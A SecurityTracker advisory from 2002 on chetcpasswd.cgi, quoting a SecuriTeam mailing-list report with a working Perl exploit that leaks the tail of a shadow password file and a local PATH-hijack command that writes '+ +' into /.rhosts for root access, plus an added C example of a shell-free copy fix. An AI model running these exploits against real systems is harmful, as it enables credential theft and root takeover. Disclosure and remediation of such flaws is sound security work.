SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
SecurityTracker
Archives
Category:  Application (Generic)  >  chetcpasswd.cgi Vendors:  Orso, Pedro L.
Chetcpasswd.cgi Bugs May Disclose Some Shadow Password File Contents to Remote Users and May Let Local Users Grab Root Privileges
SecurityTracker Alert ID:  1005847
SecurityTracker URL:  http://securitytracker.com/id?1005847
CVE Reference:  CVE-2002-2219, CVE-2002-2221
Updated:  Jun 8 2008
Original Entry Date:  Dec 23 2002
Impact:  Disclosure of authentication information, Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): 1.2 and prior versions
Description:  A vulnerability was reported in the 'chetcpasswd.cgi' password utility. A remote user may be able to obtain access to portions of the shadow password file. A local user could gain root access on the system.

SecuriTeam reported that a remote user may be able to get a "shadow's tail". A remote user can reportedly submit the form with 120 chars in the user field to cause the system to return a tail of the shadow password file. Some demonstration exploit code is provided in the Source Message.

It is also reported that a local user can execute arbitrary shell commands with root privileges. The code reportedly trusts the PATH environment variable. A local user can create their own binary named "cp" and set the PATH variable to the directory containing that malicious "cp" binary. Then, the local user can use the web interface to cause the script to execute the malicious binary.

A demonstration exploit is provided:

echo "echo + + /.rhosts" > /tmp/cp
export PATH=/tmp:$PATH
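As an added defensive example (not code from chetcpasswd or the advisory), the C below replaces the system("cp template pwdfile") call quoted in the source message with an in-process copy, so a planted "cp" on PATH has nothing to hijack; the self-check's template contents and temp-file names are constructed.

```c
/* Added example, not code from chetcpasswd or the advisory. The CGI ran as root
 * and called system("cp <template> <pwdfile>"), so "cp" was looked up through the
 * caller-controlled PATH and run by a shell. This copies with plain syscalls instead. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Copy src to dst in-process: no shell, no PATH lookup, no argv parsing. O_NOFOLLOW
 * refuses symlinked paths, which matters when the process is privileged. 0 ok, -1 error. */
int copy_file_noshell(const char *src, const char *dst)
{
    char buf[4096]; ssize_t n;
    int in = open(src, O_RDONLY | O_NOFOLLOW);
    if (in < 0) return -1;
    int out = open(dst, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0600);
    if (out < 0) { close(in); return -1; }
    while ((n = read(in, buf, sizeof buf)) > 0) {
        for (ssize_t off = 0; off < n; ) {          /* handle short writes */
            ssize_t w = write(out, buf + off, (size_t)(n - off));
            if (w < 0) { close(in); close(out); return -1; }
            off += w;
        }
    }
    close(in);
    return (n == 0 && close(out) == 0) ? 0 : -1;
}

/* Self-check: write a constructed template, point PATH at a bogus directory
 * (where a planted "cp" would have been found) and verify the copy still
 * matches byte for byte. Returns 1 on success, 0 otherwise. */
int demo_copy_ignores_path(void)
{
    const char *sample = "alice:$6$constructed$notarealhash:19000:0:99999:7:::\n";
    char tpl[] = "/tmp/chetc-tpl-XXXXXX", dst[] = "/tmp/chetc-dst-XXXXXX";
    char back[128] = {0};
    int ft = mkstemp(tpl), fd = mkstemp(dst), ok;
    if (ft < 0 || fd < 0) return 0;
    close(fd);
    ok = write(ft, sample, strlen(sample)) == (ssize_t)strlen(sample); close(ft);
    setenv("PATH", "/nonexistent", 1);
    if (ok && copy_file_noshell(tpl, dst) == 0) {
        int r = open(dst, O_RDONLY);
        ok = r >= 0 && read(r, back, sizeof back - 1) > 0 && strcmp(back, sample) == 0;
        if (r >= 0) close(r);
    } else ok = 0;
    unlink(tpl); unlink(dst);
    return ok;
}
```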

Impact:  A remote user can obtain a "tail" of the shadow password file. A local user can execute arbitrary code with root privileges.
Solution:  No solution was available at the time of this entry.

The author of the report has indicated that, as a workaround, you can implement the '/etc/chetcpasswd.allow' file to restrict use of the script to specific IP addresses or IP address ranges.

Vendor URL:  web.onda.com.br/orso/
Cause:  Exception handling error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  support@securiteam.com
Message History:   None.


 Source Message Contents

Date:  22 Dec 2002 12:24:46 +0200
From:  support@securiteam.com
Subject:  [UNIX] chetcpasswd.cgi Multiple Vulnerabilities

 

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

chetcpasswd.cgi Multiple Vulnerabilities
------------------------------------------------------------------------

SUMMARY

<http://web.onda.com.br/orso/> Chpasswd is a utility that allows your users to change their Squid or Web password using the browser. A lot of vulnerabilities have been found allowing remote attackers to get a "shadow's tail" without a valid user (Exploit Code Below) and (a possible) local exploit to get the root shell.

DETAILS

Vulnerable systems:
 * chetcpasswd version 1.2 and earlier

Exploit:
If you fill the form with 120 chars in the user field, the system returns the shadow file's tail without any restriction.

Exploit Code (Remote):

#!/usr/bin/perl -w
#Exploit coded by Victor Pereira <vpereira@modulo.com.br>
#Thanks to Alexandre Vargas And Thiago Zaninotti
use strict;
use Socket;
my ($remote,$port, $iaddr, $paddr, $proto,$linha,$query,$len_query,$ARGC,$fakeuser,$linhas,$pattern);
$ARGC=@ARGV;
if($ARGC < 1){
    print "chetcpasswd.cgi exploit\n";
    print "coded by VP <vpereira\@modulo.com.br>\n";
    print "Usage:$0 <host>\n";
    exit;
}
# over-long user name that triggers the bug; the pattern strips it from the reply
$fakeuser="ASSHOLEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
$pattern="User: E*E";
$query="user=$fakeuser&old_pw=teste&new_pw1=teste1&new_pw2=teste1&change='Altere minha senha'";
$len_query=length($query);
$remote = $ARGV[0];
$port = 80; # random port
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
die "No port" unless $port;
$iaddr = inet_aton($remote) || die "no host: $remote";
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket: $!";
connect(SOCK, $paddr) || die "connect: $!";
select(SOCK); $|=1; select(STDOUT);
# hand-built HTTP POST of the password-change form
print SOCK "POST /cgi-bin/chetcpasswd.cgi HTTP/1.0\n";
print SOCK "Connection: Keep-Alive\n";
print SOCK "Content-type: application/x-www-form-urlencoded\n";
print SOCK "Content-length: $len_query\n";
print SOCK "\n$query\r\n\r\n";
$linha = "";
# strip HTML tags and print only the lines that contained markup
while (<SOCK>) {
    $linha = $_;
    if($linha =~ s/<.*?>//g){
        $linha =~ s/$pattern//g;
        print $linha;
    }
}
close (SOCK) || die "close: $!";
exit;

Exploit (Local):
Reading the source code you can find (lines 229-235) something like this:

<codigo>
if(ok) {
    sprintf(command,"cp %s %s",template,pwdfile);
    system(command);
    unlink(template);
    sprintf(Msg,"<font color=blue size=+2>%s %s.",msg18,User);
    Hmsg(Msg, Uid, Gid);
}
</codigo>

Well, the code trusts an environment variable named PATH; if you create a script named "cp" and change the value of the PATH variable, then via the WWW interface you can exec your cp. Something like:

echo "echo + + /.rhosts" > /tmp/cp
export PATH=/tmp:$PATH

And then via the Web interface you try to change your password.

Workaround:
From the README: Create the /etc/chetcpasswd.allow file with the IPs or sub-nets allowed to use it. Eg.:
192.168.82.10 - only this IP will use
192.168.82.0 - IPs from 1 to 255
192.168.0.0 - ...
192.0.0.0 - ...
0.0.0.0 - allow anybody. A bad choice...

ADDITIONAL INFORMATION
This information has been provided by <mailto:vpereira@modulo.com.br> Victor Pereira.



Copyright 2007, SecurityGlobal.net LLC